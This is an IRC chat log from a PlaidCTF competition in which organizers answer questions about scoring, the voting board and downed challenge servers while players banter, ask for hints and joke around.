(03:39:11) (+cai_) it's 4%, 2%, 1% for first, second, and third blood, respectively
(03:39:20) (deject3d) hey can i report a challenge bug in a pm to an op instead of email
(03:39:24) (+cai_) i should've put that in the rules, oh well
(03:39:25) (x7r0n) oh gotcha :-)
(03:39:30) (poppopret) isn't it like 4 am @ CMU?
(03:39:33) (+cai_) sorry about it not being clear
(03:39:35) (poppopret) you guys don't sleep? lol
(03:39:41) (+cai_) yeah it's almost 5 am here
(03:39:45) (Yen1) could web300 get poked?
(03:39:49) (inter) cai_ woke up from his nap
(03:39:50) ([CISSP]ibit) PWNABLES USES SECCOMP WHAT??
(03:40:00) (+cai_) some of us are sleeping, so we have organizers when i'm sleeping :p
(03:40:02) (tokki) dang
(03:40:12) (+cai_) i didn't sleep yet, although i plan to go to bed soon
(03:40:19) qUit: (nvs) (6adc5033@gateway/web/cgi-irc/kiwiirc.com/ip.106.220.80.51) Quit: http://www.kiwiirc.com/ - A hand crafted IRC client
(03:40:21) (+clockish) oh hey it's my seccomp problem
(03:40:24) (+cai_) lol
(03:40:24) ([CISSP]ibit) ./tenement: error while loading shared libraries: libseccomp.so.2: cannot open shared object file: No such file or directory
(03:40:29) ([CISSP]ibit) clockish
(03:40:30) ([CISSP]ibit) i love you man
(03:40:38) (+clockish) err wait
(03:40:41) (+clockish) it's not
(03:40:43) (+clockish) i said nothing
(03:40:45) (inter) clockish: im on a mac brah
(03:40:49) (inter) elf 32bit linux?
(03:40:50) (inter) homie
(03:40:51) (inter) what dat
(03:40:52) (tokki) lol
(03:40:54) (inter) WHAT DAT?
(03:40:54) (tokki) ikr
(03:41:25) (arthurdent) inter: your linux has elfs in it? i hear that's normal
(03:41:42) (arthurdent) but you still might want to get it checked out
(03:41:56) (inter) i have elfs in my house
(03:41:56) (razvanc) so the heartbleed is down now?
(03:42:01) (arthurdent) seems that way
(03:42:09) (arthurdent) i can't connect to any ports anymore
(03:42:13) (tokki) ftw
(03:42:18) (Aegil) If its finnish elfs in your linux, you need to look after them or they cause mischeif, or so the stories go
(03:42:18) (+cai_) yeah it's down
(03:42:22) (namrog84) fafgerwsafsdsd
(03:42:23) ([CISSP]ibit) is the libseccomp error intentional
(03:42:24) ([CISSP]ibit) ?
(03:42:26) (Aegil) usually sauna elfs :)
(03:42:29) ([CISSP]ibit) cuz my system supports seccomp :|
(03:42:39) (beugueuT4T) where is the second mao?
(03:42:43) (inter) [CISSP]ibit is rich
(03:42:46) (inter) rich boi
(03:42:47) qUit: (fixception) (322e9f29@gateway/web/freenode/ip.50.46.159.41) Quit: Page closed
(03:42:52) ([CISSP]ibit) heh
(03:43:08) (inter) i personally was looking forward to crypto problems
(03:43:26) (inter) but there arent that many this year :/
(03:43:34) (+cai_) we are rebooting heartbleed server. should be back soon
(03:44:27) (warrick) mod available for web300 question?
(03:45:02) ([CISSP]ibit) u guys are kilin me
(03:45:25) jOin: (badeec) (~badeec@2a02:810d:640:7bc:6a5d:43ff:fe80:ce1a)
(03:45:31) (inter) [CISSP]ibit if you can crack admin for UBC's student service
(03:45:35) (inter) i will give you a cookie
(03:45:37) (+clockish) inter: there are a lot of crypto challenges
(03:45:44) (+clockish) like RSA!
(03:45:49) ([CISSP]ibit) lol
(03:45:49) (tokki) RSA!
(03:45:53) (+clockish) but, they are yet to be open
(03:46:02) (inter) pshhh RSA? thats not crypto
(03:46:04) jOin: (ShortKidd) (60279873@gateway/web/freenode/ip.96.39.152.115)
(03:46:17) (+clockish) it's RSA, how can it not be crypto
(03:46:30) (tokki) " He's called The Plague, not The Nice Guy."
(03:46:30) (inter) thats crip-to
(03:46:39) (x7r0n) its forensics :-p
(03:46:39) (tokki) this reminds me of Bill nye the science guy
(03:46:45) (x7r0n) forensics-450
(03:46:55) (inter) crips and bloods and stuff
(03:46:58) (inter) killin people
(03:47:02) (inter) all dey errr dey
(03:48:17) (hellman) tylerni7: Last submission XX ago doesnt work
(03:48:25) (inter) hellman: tylerni7 afk
(03:48:37) (+frozencemetery) the elfs might let all the magic smoke out D:
(03:48:39) (arthurdent) clockish: is heartbleed still down?
(03:48:42) (+cai_) hellman: where?
(03:48:49) (+cai_) at the index page?
(03:48:49) (x7r0n) hey y cant u make the chronosphere recharge fastly
(03:48:50) (+clockish) arthurdent: yeah, working on it
(03:49:03) (+clockish) x7r0n: it takes lots of power
(03:49:09) (+clockish) too hard
(03:49:10) (inter) chronosphere is up when a team breakthroughs a new problem for first
(03:49:17) (x7r0n) get them some then :-p
(03:49:19) (hellman) cai_: yes. it shows we submitted a task 12 hours ago though we submitted two in the last hour
(03:49:32) (inter) clockish but what happens if you guys reach the end of the board?
(03:49:34) (+frozencemetery) we need to put more hearts back in heartbleed because they all bled out
(03:49:36) (inter) do you guys open up the rest?
(03:49:39) (+cai_) hellman: weird.. hmm
(03:49:43) (+clockish) inter: you'll have to get there and find out!
(03:49:52) (inter) lets vote 6 bois
(03:49:55) (inter) end the ctf quick
(03:50:21) (+cai_) inter: it loops :p
(03:50:27) (hellman) cai_: team mate who submitted says he sees 8 minutes ago
(03:50:30) (+cai_) hellman: do other teammates also see the same thing?
(03:50:34) (hellman) :)
(03:50:35) (+cai_) ah ok
(03:50:44) (+cai_) so it may just be caching, try refreshing
(03:50:52) jOin: (nvs) (6adc6d77@gateway/web/cgi-irc/kiwiirc.com/ip.106.220.109.119)
(03:51:05) (+cai_) (or rather, that part isn't real time)
(03:51:25) (tokki) *gasp*
(03:51:58) (+cai_) actually nvm, it should be realtime, but i guess it was just out of sync
(03:52:04) (inter) im
(03:52:05) (inter) trying to
(03:52:10) (inter) apply accountings logics
(03:52:15) (inter) to macroeconomics
(03:52:19) (tokki) :O
(03:52:26) (ShortKidd) play terran
(03:52:30) (inter) and i think i shoudlnt do it
(03:52:34) (namrog84) i hate mtpox
(03:52:51) (+frozencemetery) hmm, you should vote big so that we can find out what happens at the end of the scoreboard because I'm too lazy too look at the source and figure it out
(03:53:01) (tokki) lol
(03:53:03) (inter) #lifeofafinancemajor
(03:53:14) (tokki) moniez
(03:53:35) (namrog84) anyone whos solved mtpox, can i ask you a simple question?
(03:53:48) (+cai_) frozencemetery: if you are talking about that empty boxes, the game pretends it's not there
(03:53:52) (+cai_) and it loops to the past
(03:54:03) (+frozencemetery) aww you killed the suspense :P
(03:54:13) (+cai_) but once we loop, the 'already opened' tiles are excluded for the roll :p
(03:54:18) (+cai_) hehe
(03:54:23) (ShortKidd) You should include them
(03:54:33) (+cai_) then it'd take forever to unlock problems
(03:54:38) (ShortKidd) exactly
(03:54:55) (ShortKidd) we'd actually have to work together to unlock more problems
(03:55:00) (+cai_) heh
(03:55:09) ([CISSP]ibit) so far the hardest part of this challenge is finding a download for seccomp lib
(03:55:16) (+cai_) the voting has been working pretty well this year, actually
(03:55:19) (+cai_) i'm surprised
(03:55:37) (+cai_) every year, we have some sort of voting for opening up the next problem, but it usually just becomes pretty random
(03:55:41) (tokki) but how do you know what vote is for what prob?
(03:55:50) (ShortKidd) count forward that many spaces
(03:55:53) (+cai_) ^
(03:55:53) (tokki) oh
(03:56:11) (+cai_) the vote is for how many tiles you will go forward
(03:56:41) (tokki) damn now I get it
(03:56:42) (+cai_) now, i think people will get confused as we loop the board since the opened problem tiles are not being counted
(03:56:59) (ShortKidd) I should probably look at the problems a bit more than 5 minutes...
(03:57:01) (asmoday) heartbleed is still up?
(03:57:01) (+cai_) so you'll have to skip them when you calculate it (chance cards still count)
(03:57:07) (tokki) *nods*
(03:57:11) (ShortKidd) All chance, cai?
(03:57:18) (asmoday) not seeing any traffic
(03:57:25) (+clockish) asmoday: it is not still up
(03:57:26) (+cai_) asmoday: it's still being fixed
(03:57:28) (+clockish) I am working on it
(03:57:35) qUit: (bobsteam) (1817f0b6@gateway/web/freenode/ip.24.23.240.182) Ping timeout: 240 seconds
(03:57:48) (+cai_) ShortKidd: once you land on a chance card, you can't land on another chance card on the next roll
(03:57:53) (+cai_) to prevent chance chain
(03:58:04) (ShortKidd) alright
(03:58:05) (tokki) chance chaining!
(03:58:17) supersat stabs mtpox
(03:58:38) ShortKidd cries cause of mtpox's heartbleed from the stabbing
(03:58:50) (supersat) if only
(03:58:52) (tokki) lol
(03:59:02) (+cai_) i mean, the fact that you'll always have 3 unsolved problems wouldn't change. whole voting/boardgame is there for fun factor
(03:59:29) (+cai_) and give some capabilities to the players to choose which problem to be opened
(03:59:34) (ShortKidd) you should make them worth a negative amount of points, but put the negative sign in really small font
(03:59:44) (+cai_) lol
(04:00:36) (tokki) lol
(04:00:47) (+cai_) alright, i'm going to sleep now. cya all later
(04:00:51) (tokki) bbye
(04:00:55) (chuckleberry) <o
(04:01:07) (ShortKidd) bye
(04:01:52) (tomcr00se) omg rsa was solved!
(04:02:45) (warrick) clockish: could you nudge whatscats
(04:03:03) (+clockish) warrick yeah, sure
(04:03:14) (warrick) thanks
(04:03:27) (fritz[]) heartbleed seems down
(04:03:46) (Yen1) also could you nudge whatcats
(04:04:47) (+clockish) whatscats nudged with a large hammer
(04:04:48) (WhizzMan) fritz[]: clockish already said he's working on it
(04:04:58) (+clockish) fritz[]: yeah, real soon
(04:05:20) (hellman) cai_: i've logged in again in another browser and still 12 hours ago.
(04:05:34) (tokki) he's sleepin'
(04:05:34) (hellman) well that's not important at all
(04:05:38) jOin: (f___) (5f1dfc82@gateway/web/freenode/ip.95.29.252.130)
(04:05:47) (hellman) that stuff i mean :D
(04:05:51) (mttpgrm) is the hidden service up?
(04:06:01) (Yen1) clockish: thanks
(04:06:07) (mttpgrm) can't get to it through my own tor connection or on tor2web
(04:06:09) (warrick) clockish: thank you!
(04:06:23) (fritz[]) thx
(04:06:34) (reanimus) beautiful how much faster whatscat runs after emptying the db lol
(04:06:49) nIck: ([CISSP]ibit) is now known as (insanitybit)
(04:06:54) qUit: (nvs) (6adc6d77@gateway/web/cgi-irc/kiwiirc.com/ip.106.220.109.119) Quit: http://www.kiwiirc.com/ - A hand crafted IRC client
(04:06:57) (reanimus) pretty sure the reason the exploit wasn’t working was cause the query was timing out lol
(04:07:33) (insanitybit) k how do i change my name back
(04:07:50) qUit: (nullProtectorate) (
[email protected]) Ping timeout: 258 seconds
(04:08:16) (insanitybit) o
(04:08:17) (insanitybit) i did it
(04:08:24) nIck: (tokki) is now known as (evertokki)
(04:08:30) pArt: (insanitybit) (969cdb9b@gateway/web/freenode/ip.150.156.219.155)
(04:08:58) jOin: (insanitybit) (969cdb9b@gateway/web/freenode/ip.150.156.219.155)
(04:10:13) (evertokki) lol that exit message
(04:10:29) (ryan-c) any plaid people awake?
(04:10:34) (ryan-c) I have a question about rsa
(04:10:39) (insanitybit) barely
(04:10:44) (insanitybit) rsa nsa backdooors
(04:10:48) (evertokki) I think clockish is awake
(04:10:53) (+clockish) I am
(04:10:55) (insanitybit) he is
(04:11:01) (+clockish) and trying to fix heartbleed
(04:11:06) (+frozencemetery) I am also awake
(04:11:07) (evertokki) kudos, man
(04:11:10) (ryan-c) it's a quick question
(04:11:15) (mrsmith67) heartbleed down?
(04:11:25) (+frozencemetery) ryan-c: I can't guarantee that I can help, but pm?
(04:11:28) (insanitybit) so like i literally cant get the pwnable to execute
(04:11:31) (+frozencemetery) mrsmith67: coming back soonish
(04:11:32) (insanitybit) and im too drunk
(04:11:34) (insanitybit) for gdb
(04:11:36) (insanitybit) and hopper
(04:11:45) (+frozencemetery) mrsmith67: we bled too many hearts and have to put more in it
(04:11:48) (synthverity) Alcohol is funnnnnnnnnnnnnnnnn.
(04:11:49) (evertokki) :O
(04:11:58) (+clockish) mrsmith67 yes it is, working on it
(04:11:58) (pipecork) alcohol is fun.
(04:12:00) (synthverity) I'm so drunk that it is fun
(04:12:09) (synthverity) I can't type
(04:12:12) (evertokki) lol
(04:12:18) (insanitybit) ^uses 's
(04:12:26) (synthverity) Grammer matters
(04:12:28) (insanitybit) apostraphes
(04:12:38) (synthverity) Fucking newbies
(04:12:45) (synthverity) Grammar
(04:12:46) (synthverity) Fuck
(04:13:15) (evertokki) grammar loves you
(04:13:21) (synthverity) Even with alcohol, grammar is still important
(04:13:36) (synthverity) Why can't the room stop spinning?
(04:13:46) (evertokki) lol
(04:13:51) (X-N2O_) who wrote hudak (reversing 250)?
(04:13:59) (namrog84) salt n pepper
(04:14:01) (synthverity) A person
(04:14:10) (evertokki) hints? hints? hints??
(04:14:14) (+frozencemetery) X-N2O_: that's mserrano's problem; he's asleep
(04:14:20) (+frozencemetery) evertokki: hints come through Chance :)
(04:14:23) evertokki is thirsty for hints
(04:14:27) (evertokki) :O
(04:14:31) (stypr) hi
(04:14:32) (X-N2O_) ah i see thanks
(04:14:35) (tigerwash) hi guys, the heartbleed challange seems down, is that right?
(04:14:36) (evertokki) EVERYONE VOTE 1 AFTER THIS
(04:14:36) (Otacon22) is rendezvous working?
(04:14:38) (stypr) so difficult.
(04:14:49) (plo) is heartbleed still down?
(04:14:55) (evertokki) you guys should put 'heartbleed down' for notice or smthing.
(04:14:55) (+frozencemetery) tigerwash: yes, it bled all the hearts out so it's down while we refill the hearts
(04:14:57) (+frozencemetery) plo: ^
(04:15:20) (stypr) is heartbleed dead?
(04:15:22) (plo) :) thx
(04:15:22) (arthurdent) :(
(04:15:25) (evertokki) lol
(04:16:17) jOin: (qwasdf) (afc14aa8@gateway/web/freenode/ip.175.193.74.168)
(04:16:19) (+frozencemetery) evertokki: there already is one
(04:16:39) (ShortKidd) meh imma sleep
(04:17:01) (ShortKidd) beback in like 4 ish hours
(04:17:05) (synthverity) Sleep? Fucking pointless
(04:17:19) nIck: (OS-11532) is now known as (raudi)
(04:17:25) (synthverity) I'm drunk and I don't need sleep
(04:18:23) (synthverity) I can sleep when the devil calls my name
(04:18:35) qUit: (Guest77623) (4ba3c7ba@gateway/web/freenode/ip.75.163.199.186) Ping timeout: 240 seconds
(04:19:03) (pipecork) shit
(04:19:08) (pipecork) that's hxc
(04:21:47) (WhizzMan) toor
(04:21:55) jOin: (approximatehack) (7ab36aae@gateway/web/freenode/ip.122.179.106.174)
(04:22:33) (+frozencemetery) garlic: The Other Onion Router
(04:23:42) jOin: (dunamis) (~dunamis@unaffiliated/dunamis)
(04:23:45) (dunamis) moin
(04:26:59) jOin: (bobsteam) (1817f0b6@gateway/web/freenode/ip.24.23.240.182)
(04:27:05) (approximatehack) heartbeat server down?
(04:27:47) (mttpgrm) ye
(04:28:05) (+clockish) approximatehack yes
(04:28:06) (HeadHunter) web300 problem? I mean "ssss" ;)
(04:28:30) (bobsteam) yeah, hitting probs with web300 as well
(04:28:42) (+clockish) is web300 whatscat?
(04:28:46) (bobsteam) yup
(04:28:54) (+clockish) I'll kick it, hang on
(04:30:26) (+clockish) bobsteam: HeadHunter: what'scat should be back
(04:30:46) (bobsteam) tyty
(04:32:13) jOin: (B1N4RY) (0e23effa@gateway/web/freenode/ip.14.35.239.250)
(04:32:18) (B1N4RY) Hello guys
(04:34:05) qUit: (insanitybit) (969cdb9b@gateway/web/freenode/ip.150.156.219.155) Ping timeout: 240 seconds
(04:34:16) (+clockish) B1N4RY hi!
(04:35:37) (B1N4RY) pCTF this year isn't too difficult, but still not an easy CTF :(
(04:35:56) (+clockish) :) we try
(04:36:27) (+clockish) congratz to 0xffa for ZFS solve!
(04:37:04) (+frozencemetery) someone who solved ZFS from 0xffa, can you pm me? Nothing bad, I just have a question
(04:37:29) (auscompgeek) lel zfs
(04:37:42) (B1N4RY) Wow frozencemetery scared me even though I am not one of 0xffas
(04:38:02) (sven) :D
(04:38:08) jOin: (insanitybit) (969cdb9b@gateway/web/freenode/ip.150.156.219.155)
(04:38:22) (+frozencemetery) B1N4RY: heh, sorry :)
(04:38:24) (+clockish) 0xffa: The creator advertised ZFS as being really hard, so we would like to discuss how awesome you are ^_^
(04:38:26) (stypr) dat mtpox..
(04:39:33) (B1N4RY) mtpox..lol..
(04:39:57) (namrog84) hate it
(04:40:03) (namrog84) it must die
(04:40:14) (B1N4RY) clockish: Do you really have to 'discuss' how awesome he is lololol
(04:40:35) (zoff_ita) hi!
(04:40:53) (+frozencemetery) B1N4RY: if you want the truth, we're looking to make fun of the person who made zfs :)
(04:40:54) (+clockish) B1N4RY: yes. awesome is srs bzns.
(04:41:01) (zoff_ita) any admin up for a question about web150?
(04:41:34) (krycek) heartbleed still downb?
(04:41:36) (+clockish) zoff_ita: is that mt pox?
(04:41:44) (+clockish) krycek: yes it is still down, sorry
(04:41:46) (+clockish) working on it
(04:41:53) (krycek) np, just checking
(04:42:06) (zoff_ita) clockish: yep
(04:42:30) (supersat) heh... I was wondering if the challenge was to guess the port :P
(04:42:34) (+clockish) zoff_ita: pm me in like 5 min, I almost have heartbleed back online
(04:42:38) (supersat) sorry about hitting them all at once :x
(04:42:57) (zoff_ita) clockish: ok, tnx
(04:44:58) qUit: (dhanvi) (uid26809@gateway/web/irccloud.com/x-kianptpjxdbfaxdb) Quit: Connection closed for inactivity
(04:48:32) jOin: (CW) (c50626a8@gateway/web/freenode/ip.197.6.38.168)
(04:48:35) qUit: (approximatehack) (7ab36aae@gateway/web/freenode/ip.122.179.106.174) Ping timeout: 240 seconds
(04:49:07) jOin: (approximatehack) (7ab326bb@gateway/web/freenode/ip.122.179.38.187)
(04:50:28) (B1N4RY) Hmm
(04:50:42) (B1N4RY) when is Heartbleed going to be available?
(04:51:06) (+frozencemetery) B1N4RY: unsure. Probably best to work on something else for a while, sorry
(04:51:12) (+clockish) "soon"
(04:51:15) (+frozencemetery) it takes a while to find people to harvest hearts from at this hour
(04:51:17) (B1N4RY) :D
(04:51:26) (asmoday) yeah did not think zfs would be just a scalpel away
(04:54:33) (B1N4RY) RAAAGGEEEE QUUIIIITTT
(04:54:58) (synthverity) Fuck yea Alcohol
(04:55:07) (WhizzMan) frozencemetery: I would suggest putting up your resume and use the recruiters that would flock to that, but they don't have a heart :s
(04:55:22) (+frozencemetery) haha zing!
(04:55:38) (+frozencemetery) sooo glad I don't have to worry about resumes for a while
(04:56:16) (stypr) how come I am the only one who didn't solve mtpox yet
(04:56:39) (stypr) btw mtpox was actually a phishing site for mtgox
(04:57:31) (insanitybit) what happened with cahnce
(04:57:47) (slinkyman) got nothing
(04:58:41) (insanitybit) i dotn know json xmgfd
(04:58:55) qUit: (f00b4r_) (
[email protected]) Read error: Connection reset by peer
(04:59:49) qUit: (gut) (
[email protected]) Quit: My MacBook Pro has gone to sleep. ZZZzzz…
(05:00:55) jOin: (glzo) (76468068@gateway/web/freenode/ip.118.70.128.104)
(05:01:42) qUit: (f00b4r_) (
[email protected]) Read error: Connection reset by peer
(05:02:23) qUit: (hkr`) (~hkr@unaffiliated/hkr/x-6459160) Ping timeout: 240 seconds
(05:04:26) (+clockish) congratz samuri, first blood!
(05:04:30) (supersat) stypr: I haven't solved it either :( it seemed like it'd be so easy too
(05:05:21) (ius) paris is 404?
(05:05:49) (ius) http://play.plaidctf.com/files/paris-accb1b840fcb5aa98561827e2bb8950b.tar.bz2
(05:05:55) (+frozencemetery) yes, working on it
(05:06:06) (stypr) (sigh)
(05:06:23) (synthverity) Vote 1 guys. Get each piece one by one
(05:06:31) (synthverity) Like Noah, except minus one
(05:06:41) (synthverity) Because fuck two by two
(05:06:55) nIck: (vladum_) is now known as (vladum|away)
(05:07:13) (+frozencemetery) fixed
(05:07:14) (+clockish) THE ANTS GO MARCHING TWO BY TWO, HURRAH, HURRAH
(05:07:17) (+frozencemetery) apologies for the mixup
(05:07:21) (+frozencemetery) you may need to reload the page
(05:09:01) jOin: (halfvollemelk) (589f763c@gateway/web/freenode/ip.88.159.118.60)
(05:09:25) (insanitybit) clockish
(05:09:29) (insanitybit) if i say clockish does it pping you
(05:09:55) (foundation) hmm, guys, is there a reason i don't see now challenges as open?
(05:10:29) (+frozencemetery) foundation: are you looking at the correct side of the board?
(05:10:33) (halfvollemelk) Is it true the TOR page for Rendesvous (MISC 250) is down?
(05:10:34) (+clockish) insanitybit: yes
(05:10:44) (insanitybit) clockish woah woah
(05:11:04) (+clockish) halfvollemelk: that problem is currently working as intended
(05:11:35) qUit: (sakana) (3b9ffaf2@gateway/web/freenode/ip.59.159.250.242) Ping timeout: 240 seconds
(05:11:46) (foundation) frozencemetery: there is another side of the board? hhow do i get there?
(05:12:04) (+frozencemetery) foundation: as stated in the rules, click on the glowing ball in the middle of the spinner
(05:12:04) (insanitybit) ^
(05:12:06) (inter) clockish: fuck it im done studying
(05:12:12) (inter) im going to yolo my finals
(05:12:23) (+frozencemetery) fuck school ctf all day
(05:12:26) (inter) or a final since its only one tmr
(05:12:26) (+frozencemetery) (don't take that advice)
(05:12:26) (insanitybit) who cares about finals
(05:12:32) (insanitybit) or school
(05:12:35) (insanitybit) or anything even
(05:12:48) (+clockish) insanitybit: I care about CTF!
(05:12:48) (inter) frozencemetery: exam in 8 hours, i need to sleep too and i commute
(05:12:56) (foundation) *facepalm* thanks frozencemetery
(05:13:06) (insanitybit) ctf is the opiate of the masses
(05:13:24) (inter) clockish: you'd better release the hint for pwn375 or rsa :S
(05:13:30) (insanitybit) there are hints?
(05:13:40) (inter) i risked 6 hours of my life to do your problem
(05:13:40) (sven) hints are boring
(05:13:44) (+clockish) Hints will go on the page
(05:13:45) (inter) instead of studying for final
(05:13:50) (insanitybit) what page
(05:13:53) (inter) after i come back from 3 hour exam
(05:14:11) (inter) or ill probably die in a heartattack
(05:14:19) (insanitybit) rip
(05:15:22) (insanitybit) im tiered
(05:16:09) qUit: (siginttv) (
[email protected]) Read error: Connection reset by peer
(05:16:14) jOin: (shabgard) (~mostafa@unaffiliated/shabgard)
(05:16:16) (insanitybit) can you just put a pwnable up where i send 100 A's and i get the key back
(05:16:22) (insanitybit) i think CSAW had something like that lmao
(05:16:32) (inter) 100 As?
(05:16:35) (inter) back in codegate
(05:16:41) (insanitybit) yeah like A but 100x
(05:16:42) (inter) a problem displayed the key for first 5 minutes
(05:16:44) (B1N4RY) Any hints for MtPOX?
(05:17:07) (+frozencemetery) mtgox:drugs::mtpox:rugs
(05:17:09) qUit: (x7r0n) (
[email protected]) Read error: Connection reset by peer
(05:17:15) (+frozencemetery) ^ not a hint
(05:17:20) (inter) mtpox: 420
(05:17:22) (inter) mtpox: 420
(05:17:22) (inter) mtpox: 420
(05:17:25) (namrog84) the drugs are hiding in the rugs?
(05:17:27) jOin: (x7r0n) (x7r0n@2002:75fe:a990::75fe:a990)
(05:17:31) (s_kunk) there's a flag to find
(05:17:31) (inter) im telling you man
(05:17:33) (inter) its 420
(05:17:34) (B1N4RY) 420?
(05:17:35) (s_kunk) ^ that's a hint
(05:17:35) qUit: (glzo) (76468068@gateway/web/freenode/ip.118.70.128.104) Ping timeout: 240 seconds
(05:17:38) (B1N4RY) 420????
(05:17:41) (inter) 420
(05:17:41) (B1N4RY) oh
(05:17:41) (inter) yep
(05:17:43) (insanitybit) lol
(05:17:45) (namrog84) thats not 8 characters
(05:17:46) (B1N4RY) got it '^'
(05:17:52) qUit: (l0ve) (72560111@gateway/web/freenode/ip.114.86.1.17) Quit: Page closed
(05:17:59) (inter) 420blaze is 8 characters
(05:18:02) (inter) umadm8?
(05:18:16) jOin: (l0ve) (72560111@gateway/web/freenode/ip.114.86.1.17)
(05:18:23) (insanitybit) wrekcdd
(05:18:42) qUit: (l0ve) (72560111@gateway/web/freenode/ip.114.86.1.17) Client Quit
(05:18:55) (namrog84) iubermadandepicsad
(05:19:03) (insanitybit) dam
(05:19:06) (insanitybit) is that the key
(05:19:06) jOin: (pcc7) (72560111@gateway/web/freenode/ip.114.86.1.17)
(05:19:19) (pcc7) anyone working on pyjail?
(05:19:22) (insanitybit) yes
(05:19:33) (insanitybit) i feel like im mostly done w/ it but i stopped working hours ago to drink
(05:19:38) (B1N4RY) Is ^ in mtpox something to do with bitwise
(05:19:59) qUit: (rvpersie_) (
[email protected]) Remote host closed the connection
(05:20:36) (insanitybit) more like a bitdumb
(05:20:36) (insanitybit) heh
(05:20:36) (s_kunk) ^ was not a hint, scrollback ;)
(05:20:43) (inter) one
(05:20:46) (inter) hell of a pwnable
(05:20:50) (inter) we're getting
(05:21:12) (insanitybit) kappa
(05:21:57) (insanitybit) start spam
(05:21:58) (insanitybit) isi the key
(05:23:08) (B1N4RY) Oh
(05:23:10) (B1N4RY) ...
(05:23:21) (B1N4RY) 420? 420?
(05:23:25) (B1N4RY) What is 420!!!!
(05:23:45) (+frozencemetery) 410 is a drug reference
(05:23:50) (+frozencemetery) *420 wow
(05:23:59) (+frozencemetery) ^ my mind has been P3 and I apologize
(05:24:20) (bobsteam) holy shit, I think I just got the hint ... lol ~_~
(05:26:05) (Nanomebia) shouldn't there be another challenge open?
(05:27:04) (insanitybit) oh god
(05:27:05) (insanitybit) oh god
(05:27:21) (WhizzMan) thats what she said
(05:27:35) qUit: (CW) (c50626a8@gateway/web/freenode/ip.197.6.38.168) Ping timeout: 240 seconds
(05:29:01) (insanitybit) 3 pokemon
(05:29:02) (insanitybit) gotta catchem all
(05:29:19) (stypr) dat mtpox
(05:29:24) (stypr) what does the pox say
(05:29:28) (stypr) mtpox mtpox
(05:29:40) (c0ax) Hello there :)
(05:30:16) (supersat) yo
(05:30:45) (pd7) is the rendezvous challenge up?
(05:31:54) qUit: (B1N4RY) (0e23effa@gateway/web/freenode/ip.14.35.239.250) Quit: Page closed
(05:32:22) (x7r0n) any1 whom i can ask about zfs ?
(05:32:41) (+frozencemetery) x7r0n: pm me
(05:32:57) (+frozencemetery) pd7: it appears to be working as intended
(05:33:00) (c0ax) anyone who can help me with web150? Im so close
(05:33:23) (pd7) frozencemetery: meaning I'm not supposed to be able to connect until I do something?
(05:33:50) (abc) who can help me web150
(05:34:06) (c0ax) Im searching help for that too
(05:34:12) (slinkyman) what have you done so far on web150?
(05:34:12) (Nanomebia) frozencemetery: is chronosphere supposed to be charged?(only two challenges open currently)
(05:34:15) (+frozencemetery) please refer to problems by their name (which is unique), not their category and number (not unique)
(05:34:27) (slinkyman) i'm assuming you mean mtpox
(05:35:03) nIck: (Xor0X|afk) is now known as (Xor0X)
(05:36:06) (halfvollemelk) wow.. that epilepsy warning was no joke
(05:36:09) jOin: (nUl1) (5d9dadb6@gateway/web/freenode/ip.93.157.173.182)
(05:36:29) (poppopret) i think im really close to web150 but im not sure what im doing wrong
(05:37:20) (stypr) is rendezvous working properly?
(05:39:04) (deject3d) are keys on servers supposed to be actually hard to find or obvious
(05:39:29) (+frozencemetery) keys are obviously keys
(05:39:36) (+frozencemetery) typically they involve l33tsp34k
(05:40:02) (foundation) is heartbleed up again?
(05:40:06) (deject3d) if there's a key inside a file on the server is it something like /home/whatever/key
(05:40:14) (c0ax) foundation, yep
(05:40:23) (foundation) o/ c0ax
(05:40:27) (c0ax) \o
(05:41:16) (chuckleberry) when i saw the key on web150 it didn't register with my stupid brain it was the key...
(05:41:19) (chuckleberry) :(
(05:41:32) qUit: (rvpersie) (
[email protected]) Remote host closed the connection
(05:42:44) (mak`) quick question about kpop anyone?
(05:43:07) nIck: (tayacan) is now known as ([pwn]tayacan)
(05:43:38) jOin: ([SF]testdata) (75c1ace7@gateway/web/freenode/ip.117.193.172.231)
(05:44:42) (deject3d) ok
(05:44:48) (stypr) we all love kpop.
(05:44:54) (deject3d) someones putting files in my meme folder
(05:44:59) (+frozencemetery) as the notice on heartbleed says, it's not up right now
(05:45:13) (+frozencemetery) pittsburgh kinda shuts down after 10pm, so there aren't really people around to steal hearts form
(05:45:35) ([SF]testdata) @frozencemetery : notice is no longer there
(05:46:25) (+frozencemetery) [SF]testdata: you are right! We'll put it back
(05:47:07) jOin: (admiral0) (83af1cc5@gateway/web/freenode/ip.131.175.28.197)
(05:47:31) qUit: (x7r0n) (x7r0n@2002:75fe:a990::75fe:a990) Quit: Leaving
(05:47:56) (admiral0) hey ppp guys I got a grumpy no in my meme dir? What's the problem? I'm not damaging the system, just exploring
(05:48:29) qUit: (qwasdf) (afc14aa8@gateway/web/freenode/ip.175.193.74.168) Quit: Page closed
(05:49:33) (Aegil) with the hints on the instructions, if the hint is released where is that shown? is it added to the description or listed somewhere else?
(05:49:46) (ltfish) MSLC got over 1000 points all of a sudden
(05:49:53) (+clockish) ltfish: yeah we know
(05:50:01) (hellman) that was hidden challenge
(05:50:02) (+clockish) it's a bug on our side
(05:50:04) (zardus) many flags for whatscat!
(05:50:11) (ltfish) we wanna know what kind of vulns it is :P
(05:50:13) (zardus) gotta catch 'em all!
(05:50:16) (+clockish) hellman: was it intentional?
(05:50:17) (+frozencemetery) we will sanitize the data later
(05:50:18) (ltfish) it's interesting
(05:50:39) (+clockish) because it would be extra hilarious if that was intentional :)
(05:51:49) (ryan-c) hm
(05:52:07) (mak`) clockish: got a second?
(05:52:14) (+clockish) mak` yeah sure
(05:52:23) (mak`) about kpop?
(05:52:25) (bobsteam) wow whatscat is making me feel dumb
(05:52:31) (zardus) 'night all
(05:52:41) (bobsteam) night zardus
(05:52:44) (+clockish) mak` people who actually know kpop are asleep, but I can try
(05:52:54) (+clockish) pm if there are spoilers
(05:53:04) jOin: (irctc320) (83af1cc5@gateway/web/freenode/ip.131.175.28.197)
(05:53:23) pArt: (irctc320) (83af1cc5@gateway/web/freenode/ip.131.175.28.197)
(05:53:31) qUit: (virodoran) (uid2011@gateway/web/irccloud.com/x-xsqraopncqodiqvg) Quit: Connection closed for inactivity
(05:54:38) jOin: (SeawolfRN) (5f95604f@gateway/web/cgi-irc/kiwiirc.com/ip.95.149.96.79)
(05:54:44) (deject3d) was the reekee challenge updated at all because i think there was a bug earlier
(05:54:51) (deject3d) but can't reproduce
(05:55:04) (+clockish) not updated any time within the last 5-6 hours for sure
(05:55:09) (deject3d) weird
(05:55:20) (Hertz_) http://play.plaidctf.com/profile/460
(05:55:35) (Hertz_) they solved
